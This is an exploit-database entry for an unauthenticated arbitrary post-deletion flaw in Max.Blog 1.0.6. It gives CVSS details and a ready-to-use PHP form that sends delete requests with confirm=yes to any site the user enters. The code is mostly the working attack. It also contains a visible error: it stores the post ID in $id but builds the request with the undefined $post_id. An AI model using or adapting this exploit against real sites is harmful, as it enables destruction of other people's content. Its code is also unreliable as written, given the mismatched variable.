Max.Blog 1.0.6 Arbitrary Delete Post Exploit

2009.02.05
Credit: SirGod
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-264


CVSS Base Score: 6.4/10
Impact Subscore: 4.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: Partial

<html> <head> <title>Max.Blog 1.0.6 Delete Post Exploit</title> </head> <body> <p align="center"> <b>Max.Blog 1.0.6 Delete Post Exploit</b><br /><br /> <b>Discovered by <b>SirGod</b><br /> Thanks to <b>Nytro</b><br /> Please visit : <br /> ------------------------<br /> ------------------------<br /> </b> </p> <?php if(isset($_POST['submit'])) { $site=$_POST['site']; $id=$_POST['post_id']; $pagina=file_get_contents("http://".$site."/delete.php?post=".$post_id."&confirm=yes"); print "<p align=\"center\">Done!</p><br />"; } ?> <form method="POST"> <p align="center"> Site: www. <input type="text" name="site" value="site.com/path" /><br /> (without http,www and trailing slash)<br /> Post ID: <input type="text" name="post_id" value="1" /><br /><br /> <input type="submit" name="submit" value="Delete" /> </p> </form> </body> </html>

References:

http://www.mzbservices.com/show_post.php?id=72


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top